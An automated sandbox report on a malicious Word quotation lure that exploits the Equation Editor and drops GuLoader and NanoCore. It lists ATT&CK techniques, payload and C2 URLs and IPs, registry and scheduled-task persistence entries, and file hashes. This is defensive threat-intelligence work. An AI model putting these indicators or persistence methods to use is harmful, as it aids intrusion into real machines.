Spearphishing Link1	Exploitation for Client Execution13	Scheduled Task/Job1	Access Token Manipulation1	Disable or Modify Tools11	Input Capture11	File and Directory Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter1	Registry Run Keys / Startup Folder1	Process Injection112	Obfuscated Files or Information1	LSASS Memory	System Information Discovery24	Remote Desktop Protocol	Input Capture11	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job1	Logon Script (Windows)	Scheduled Task/Job1	Software Packing1	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Registry Run Keys / Startup Folder1	Masquerading122	NTDS	Security Software Discovery621	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion23	LSA Secrets	Virtualization/Sandbox Evasion23	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation1	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol113	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc	39%	Virustotal		Browse
QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc	25%	ReversingLabs	Document-RTF.Exploit.MathType

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	0%	Virustotal		Browse
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	0%	Metadefender		Browse
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt	42%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt	28%	ReversingLabs	Win32.Trojan.Guloader
C:\Users\user\subfolder1\filename1.exe	28%	ReversingLabs	Win32.Trojan.Guloader
C:\Users\Public\69577.exe	28%	ReversingLabs	Win32.Trojan.Guloader

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
6.2.RegAsm.exe.140000.3.unpack	100%	Avira	TR/NanoCore.fadte		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
194.5.98.202	0%	Virustotal		Browse
194.5.98.202	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bit.ly	67.199.248.11	true	false	high
teknik.io	5.79.72.163	true	false	high
onedrive.live.com	unknown	unknown	false	high
ibkebw.dm.files.1drv.com	unknown	unknown	false	high
u.teknik.io	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
	true	Avira URL Cloud: safe	low
194.5.98.202	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://bit.ly/2ZKf4aq	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	RegAsm.exe, 00000006.00000002.2372610828.0000000002790000.00000002.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371587310.0000000001BE0000.00000002.00000001.sdmp, RegAsm.exe, 0000000F.00000002.2323283664.0000000002500000.00000002.00000001.sdmp	false		high
http://crl.entrust.net/server1.crl0	RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	false		high
http://ocsp.entrust.net03	RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/E	RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	RegAsm.exe, 00000006.00000002.2372610828.0000000002790000.00000002.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371587310.0000000001BE0000.00000002.00000001.sdmp, RegAsm.exe, 0000000F.00000002.2323283664.0000000002500000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.diginotar.nl/cps/pkioverheid0	RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://u.teknik.io/wREzo.txt	2ZKf4aq[1].htm.2.dr	false		high
https://ibkebw.dm.files.1drv.com/y	RegAsm.exe, 00000006.00000002.2382485610.000000001DC80000.00000004.00000001.sdmp	false		high
http://ocsp.entrust.net0D	RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ibkebw.dm.files.1drv.com/	RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmp	false		high
https://secure.comodo.com/CPS0	RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	false		high
https://onedrive.live.com/download?cid=802AC8A73EEC8C8E&resid=802AC8A73EEC8C8E%21110&authkey=AK1w6-P	RegAsm.exe, RegAsm.exe, 00000006.00000002.2371992276.000000000089A000.00000004.00000020.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp	false		high
https://ibkebw.dm.files.1drv.com/y4mkt1ePYl5p-A97ciot0bQ59hcBfLkczVR077g5LVTnsSoRxe1bs39ErOjDRD_qmHQ	RegAsm.exe, 00000006.00000002.2371992276.000000000089A000.00000004.00000020.sdmp, RegAsm.exe, 00000006.00000002.2382485610.000000001DC80000.00000004.00000001.sdmp	false		high
https://onedrive.live.com/	RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
67.199.248.10	unknown	United States	396982	GOOGLE-PRIVATE-CLOUDUS	true
5.79.72.163	unknown	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	false
194.5.98.202	unknown	Netherlands	208476	DANILENKODE	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	358179
Start date:	25.02.2021
Start time:	07:28:29
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@19/25@6/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 97% Number of executed functions: 365 Number of non-executed functions: 8
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.209, 2.20.142.210, 13.107.42.13, 13.107.42.12 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, odc-web-brs.onedrive.akadns.net, odc-dm-files-geo.onedrive.akadns.net, odc-dm-files-brs.onedrive.akadns.net, odc-web-geo.onedrive.akadns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, l-0004.l-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-dm-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, l-0003.l-msedge.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, apps.identrust.com, au-bg-shim.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:28:32	API Interceptor	46x Sleep call for process: EQNEDT32.EXE modified
07:30:17	API Interceptor	77x Sleep call for process: 69577.exe modified
07:30:25	API Interceptor	570x Sleep call for process: RegAsm.exe modified
07:30:28	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\subfolder1\filename1.exe
07:30:29	Task Scheduler	Run new task: SMTP Service path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" s>$(Arg0)
07:30:29	API Interceptor	2x Sleep call for process: schtasks.exe modified
07:30:29	API Interceptor	189x Sleep call for process: taskeng.exe modified
07:30:31	Task Scheduler	Run new task: SMTP Service Task path: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" s>$(Arg0)
07:30:36	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
07:30:45	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\subfolder1\filename1.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
67.199.248.10	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	bit.ly/3aLCPVF
	PO AAN2102002-V020.doc	Get hash	malicious	Browse	bit.ly/3pNzHgj
	PO55004.doc	Get hash	malicious	Browse	bit.ly/3kioaoe
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	bit.ly/2NUvTNf
	RFQ Document.doc	Get hash	malicious	Browse	bit.ly/3qOyCWN
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	bit.ly/3qN5fEA
	Order.doc	Get hash	malicious	Browse	bit.ly/3boWBW4
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	bit.ly/2NScGvD
	IMG_57109_Scanned.doc	Get hash	malicious	Browse	bit.ly/3kemdsK
	Deadly Variants of Covid 19.doc	Get hash	malicious	Browse	bit.ly/2Me6ei3
	swift payment.doc	Get hash	malicious	Browse	bit.ly/2NmOCRI
	IMG_6078_SCANNED.doc	Get hash	malicious	Browse	bit.ly/3qIRVRz
	IMG_01670_Scanned.doc	Get hash	malicious	Browse	bit.ly/3duA4tQ
	IMG_7742_Scanned.doc	Get hash	malicious	Browse	bit.ly/3sdTreK
	QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.doc	Get hash	malicious	Browse	bit.ly/3dCBRgm
	DHL Shipment Notification 7465649870.doc	Get hash	malicious	Browse	bit.ly/3bhrITG
	Quote QU038097.doc	Get hash	malicious	Browse	bit.ly/3aom5Uu
	IMG_51067.doc__.rtf	Get hash	malicious	Browse	bit.ly/3djdyUC
	IMG_123773.doc	Get hash	malicious	Browse	bit.ly/2Nsv9ym
	B62672021 PRETORIA.doc	Get hash	malicious	Browse	bit.ly/3jOWhDW

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
bit.ly	CsmBq6KLHu.doc	Get hash	malicious	Browse	67.199.248.11
	purchase order_2242021.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	PO AAN2102002-V020.doc	Get hash	malicious	Browse	67.199.248.11
	PO55004.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	RFQ Document.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	67.199.248.10
	Order.doc	Get hash	malicious	Browse	67.199.248.10
	QUOTE.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_57109_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	Deadly Variants of Covid 19.doc	Get hash	malicious	Browse	67.199.248.10
	swift payment.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_61061_SCANNED.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_6078_SCANNED.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_01670_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_7742_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	SWIFT Payment W0301.doc	Get hash	malicious	Browse	67.199.248.11

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LEASEWEB-NL-AMS-01NetherlandsNL	purchase order_2242021.doc	Get hash	malicious	Browse	5.79.72.163
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc	Get hash	malicious	Browse	5.79.72.163
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	5.79.72.163
	PO AAN2102002-V020.doc	Get hash	malicious	Browse	5.79.72.163
	PO55004.doc	Get hash	malicious	Browse	5.79.72.163
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	5.79.72.163
	RFQ Document.doc	Get hash	malicious	Browse	5.79.72.163
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	5.79.72.163
	SecuriteInfo.com.Trojan.PackedNET.540.1271.exe	Get hash	malicious	Browse	213.227.154.188
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	5.79.72.163
	MV9tCJw8Xr.exe	Get hash	malicious	Browse	5.79.70.250
	QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.doc	Get hash	malicious	Browse	5.79.72.163
	Quotation408S_A02021_AHYAN_group_of_companies.doc	Get hash	malicious	Browse	5.79.72.163
	Request For Quotation.PDF.exe	Get hash	malicious	Browse	212.32.237.101
	PO#652.exe	Get hash	malicious	Browse	5.79.87.207
	Parcel _009887 .exe	Get hash	malicious	Browse	212.32.237.92
	PO 20211602.xlsm	Get hash	malicious	Browse	82.192.82.225
	6d0000.exe	Get hash	malicious	Browse	213.227.133.129
	SecuriteInfo.com.Trojan.PackedNET.541.9005.exe	Get hash	malicious	Browse	62.212.86.139
	New Order 83329 PDF.exe	Get hash	malicious	Browse	95.211.208.58
GOOGLE-PRIVATE-CLOUDUS	CsmBq6KLHu.doc	Get hash	malicious	Browse	67.199.248.11
	Details van vereiste.pps	Get hash	malicious	Browse	67.199.248.16
	purchase order_2242021.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc	Get hash	malicious	Browse	67.199.248.11
	Offerte aanvragen 22-02-2021.ppt	Get hash	malicious	Browse	67.199.248.16
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	PO AAN2102002-V020.doc	Get hash	malicious	Browse	67.199.248.10
	PO55004.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	RFQ Document.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	67.199.248.10
	Order.doc	Get hash	malicious	Browse	67.199.248.10
	QUOTE.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_57109_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	Deadly Variants of Covid 19.doc	Get hash	malicious	Browse	67.199.248.10
	swift payment.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_61061_SCANNED.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_6078_SCANNED.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_01670_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
DANILENKODE	swift006.pdf.exe	Get hash	malicious	Browse	194.5.97.116
	neue bestellung.PDF.exe	Get hash	malicious	Browse	194.5.97.48
	m72OvSF7e5.exe	Get hash	malicious	Browse	194.5.98.202
	neue bestellung.PDF.exe	Get hash	malicious	Browse	194.5.97.48
	Eingang.Jpg.exe	Get hash	malicious	Browse	194.5.97.116
	V33QokMrIv.exe	Get hash	malicious	Browse	194.5.98.202
	3Fv4j323nj.exe	Get hash	malicious	Browse	194.5.98.182
	scan09e8902093922023ce.exe	Get hash	malicious	Browse	194.5.98.46
	PO AAN2102002-V020.doc	Get hash	malicious	Browse	194.5.98.182
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	194.5.98.202
	neue bestellung.PDF.exe	Get hash	malicious	Browse	194.5.97.48
	Orderoffer.exe	Get hash	malicious	Browse	194.5.98.66
	neue bestellung.PDF.exe	Get hash	malicious	Browse	194.5.97.48
	OrderSuppliesQuote0817916.exe	Get hash	malicious	Browse	194.5.97.248
	DHL_6368638172 documento de recibo,pdf.exe	Get hash	malicious	Browse	194.5.97.244
	QuotationInvoices.exe	Get hash	malicious	Browse	194.5.97.248
	PAYMENT_.EXE	Get hash	malicious	Browse	194.5.98.211
	payment.exe	Get hash	malicious	Browse	194.5.98.66
	RFQ_1101983736366355 1101938377388.exe	Get hash	malicious	Browse	194.5.98.21
	Slip copy .xls.exe	Get hash	malicious	Browse	194.5.97.116

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	PO AAN2102002-V020.doc	Get hash	malicious	Browse
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse
	RFQ # TSI2202708.doc	Get hash	malicious	Browse
	rfq_20712557-20200308 Order.doc	Get hash	malicious	Browse
	31RFQ 49177 PO-DM-11-2018-109159.exe	Get hash	malicious	Browse
	69shipment Details...exe	Get hash	malicious	Browse
	64RFQ#4500052988_AHBGroup_017342213472103_20181024.exe	Get hash	malicious	Browse
	22RFQ#4500052988_AHBGroup_017342213472103_20181024.exe	Get hash	malicious	Browse
	41COSCO TBN FULLY SIGNED CPFN.exe	Get hash	malicious	Browse
	19Request for Quote_Goedeker_6397_3 01-2_12137018.exe	Get hash	malicious	Browse
	72Payment....exe	Get hash	malicious	Browse
	832238740303837363.exe	Get hash	malicious	Browse
	35Request for Quote_SOSi_6397_3 01-2_12137018.exe	Get hash	malicious	Browse
	61Request for Quote_SOSi_6397_3 01-2_12137018.exe	Get hash	malicious	Browse
	17Request for Quote_SOSi_6397_3 01-2_12137018.exe	Get hash	malicious	Browse
	59Doc_RFQ Roccia s.r.l. 180001899918 & 500037221 (1).exe	Get hash	malicious	Browse
	71RFQ Ganix Global-180001899918 & 500037221.exe	Get hash	malicious	Browse
	81PAYMENT.exe	Get hash	malicious	Browse
	59Doc_RFQ Roccia s.r.l. 180001899918 & 500037221.exe	Get hash	malicious	Browse
	2810010518.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\SMTP Service\smtpsvc.exe Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	53248
Entropy (8bit):	4.48905382202799
Encrypted:	false
SSDEEP:	768:GP2Bbv+VazyoD2z9TU//1mz1+M9GnLEu+2hhFRJS8AW:tJv46yoD2BTNz1+M9GLfvw8AW
MD5:	246BB0F8D68A463FD17C235DEB5491C0
SHA1:	63F237F94EAB14CB4DCA7ACB5817644D4428873A
SHA-256:	32B60D7BBA22CC1682F4BA651D86C9FB357BDC82E9A284AB9668E5446BD24BB3
SHA-512:	187D08DF6563739A3A537439F313D9F4D53001FA8A9CD146986DAB3C1168E25E210771AFC2A7D6C2A88EB44F0EEF2E91DDCEA8ABD86742AD0E6D78F07BDF7996
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: PO AAN2102002-V020.doc, Detection: malicious, Browse Filename: DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc, Detection: malicious, Browse Filename: RFQ # TSI2202708.doc, Detection: malicious, Browse Filename: rfq_20712557-20200308 Order.doc, Detection: malicious, Browse Filename: 31RFQ 49177 PO-DM-11-2018-109159.exe, Detection: malicious, Browse Filename: 69shipment Details...exe, Detection: malicious, Browse Filename: 64RFQ#4500052988_AHBGroup_017342213472103_20181024.exe, Detection: malicious, Browse Filename: 22RFQ#4500052988_AHBGroup_017342213472103_20181024.exe, Detection: malicious, Browse Filename: 41COSCO TBN FULLY SIGNED CPFN.exe, Detection: malicious, Browse Filename: 19Request for Quote_Goedeker_6397_3 01-2_12137018.exe, Detection: malicious, Browse Filename: 72Payment....exe, Detection: malicious, Browse Filename: 832238740303837363.exe, Detection: malicious, Browse Filename: 35Request for Quote_SOSi_6397_3 01-2_12137018.exe, Detection: malicious, Browse Filename: 61Request for Quote_SOSi_6397_3 01-2_12137018.exe, Detection: malicious, Browse Filename: 17Request for Quote_SOSi_6397_3 01-2_12137018.exe, Detection: malicious, Browse Filename: 59Doc_RFQ Roccia s.r.l. 180001899918 & 500037221 (1).exe, Detection: malicious, Browse Filename: 71RFQ Ganix Global-180001899918 & 500037221.exe, Detection: malicious, Browse Filename: 81PAYMENT.exe, Detection: malicious, Browse Filename: 59Doc_RFQ Roccia s.r.l. 180001899918 & 500037221.exe, Detection: malicious, Browse Filename: 2810010518.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,..S..................... .......... ........@.. ....................................@.....................................O................................... ................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.366016576663508
Encrypted:	false
